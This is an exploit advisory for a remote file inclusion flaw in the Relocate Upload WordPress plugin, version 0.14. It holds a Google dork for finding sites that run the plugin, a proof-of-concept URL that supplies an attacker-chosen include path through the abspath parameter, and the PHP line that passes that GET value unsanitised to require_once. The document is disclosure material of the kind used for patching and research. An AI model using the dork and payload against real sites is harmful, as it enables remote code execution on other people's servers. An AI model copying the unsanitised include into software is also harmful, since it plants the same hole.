20 lines
No EOL
742 B
Text
20 lines
No EOL
742 B
Text
# Exploit Title: Relocate Upload Wordpress plugin RFI
|
|
# Google Dork: inurl:wp-content/plugins/relocate-upload
|
|
# Date: 09/19/2011
|
|
# Author: Ben Schmidt (supernothing (AT) spareclockcycles.org @_supernothing)
|
|
# Software Link: http://wordpress.org/extend/plugins/relocate-upload/download/
|
|
# Version: 0.14 (tested)
|
|
|
|
---
|
|
PoC
|
|
---
|
|
http://SERVER/WP_PATH/wp-content/plugins/relocate-upload/relocate-upload.php?ru_folder=asdf&abspath=RFI
|
|
|
|
---
|
|
Vulnerable Code
|
|
---
|
|
// Move folder request handled when called by GET AJAX
|
|
if (isset($_GET['ru_folder']))
|
|
{ // WP setup and function access
|
|
define('WP_USE_THEMES', false);
|
|
require_once(urldecode($_GET['abspath']).'/wp-load.php'); // save us looking for it, it's passed as a GET parameter |